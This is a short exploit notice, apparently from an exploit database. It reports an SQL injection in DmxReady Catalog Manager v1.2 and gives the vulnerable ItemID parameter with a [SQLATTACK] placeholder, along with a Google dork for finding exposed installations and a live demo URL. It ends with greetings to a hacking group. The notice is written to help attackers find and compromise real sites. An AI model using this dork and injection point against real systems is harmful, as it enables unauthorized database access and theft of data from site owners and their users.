# Exploit Title: DmxReady Catalog Manager v1.2 SQL Injection Vulneratbility # Google Dork: inurl:inc_catalogmanager.asp # Date: 03.07.2011 # Author: Bellatrix # Software Link: http://www.dmxready.com/?product=catalog-manager-v1 # Version: v1.2 #Language: ASP # Price : $99.97 #Demo : http://demo.dmxready.com/applications/CatalogManager/inc_catalogmanager.asp # Tested on: Windows XP Sp3 # Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members.... ------------------------------------------------------------------------------------------------------------------------- Bug details; http://localhost/path//inc_catalogmanager.asp?gpcid=2&cid=4&scid=21&ItemID=[SQLATTACK]